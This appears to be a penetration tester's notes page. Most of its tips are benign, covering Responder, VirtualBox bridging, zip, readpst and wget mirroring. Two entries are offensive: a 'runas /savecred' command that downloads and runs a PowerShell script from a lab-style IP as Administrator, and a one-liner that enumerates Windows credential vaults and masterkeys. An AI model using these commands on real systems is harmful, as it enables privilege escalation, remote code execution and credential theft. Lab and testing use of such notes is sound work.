Links

Basic tips/scripts

Bypass Responder errors

"/usr/share/responder/./Responder.py:366: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead"
Use python3.9 version!
:> sudo python3.9 /usr/share/responder/Responder.py -I eth0

Windows 11 is not listing a bridged adapter for VirtualBox

  1. 1.
    Open windows start button.
  2. 2.
    Search for: network.
  3. 3.
    Choose: View network connections via the control panel.
  4. 4.
    Right click your primary connection (for me it was just Ethernet since I'm on a wired connection).
  5. 5.
    Select: Properties.
  6. 6.
    Click: Install....
  7. 7.
    Select: Service.
  8. 8.
    Click: Add....
  9. 9.
    Click: Have Disk....
  10. 10.
    Click: Browse.
  11. 11.
    Navigate to the associated virtualbox install location for your given drive. For example mine was: C:\Program Files\Oracle\VirtualBox\drivers\network\netlwf.
  12. 12.
    Select the file: VBoxNetLwf.inf in the above directory.
  13. 13.
    Click: OK.
  14. 14.
    Select: VirtualBox NDIS6 Bridged Networking Driver.
  15. 15.
    Click: OK.

File compressing with exception

zip -r files/temp/images.zip * -x "files/*" "*.jpg" "*.png" "*.gif" "*.jpeg" "*.wmv" "*.pdf" "*.wma" "files/imagenes/look*"

Open PST files - Linux

readpst -tea -m Access\ Control.pst

Download everything from a website

wget --limit-rate=200k --no-clobber --convert-links --random-wait -r -l 50 -p -E -e robots=off -U mozilla http://xxxxxx

Exploiting "runas /savecred"

The following command is used to start a PowerShell reverse shell as ACCESS\Administrator.
runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object
Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')"

Extract credentials Windows

The following "one-liner" will identify the available credential files and masterkeys.
cmd /c " dir /S /AS C:\Users\security\AppData\Local\Microsoft\Vault & dir /S /AS
C:\Users\security\AppData\Local\Microsoft\Credentials & dir /S /AS
C:\Users\security\AppData\Local\Microsoft\Protect & dir /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Vault & dir /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Credentials & dir /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Protect"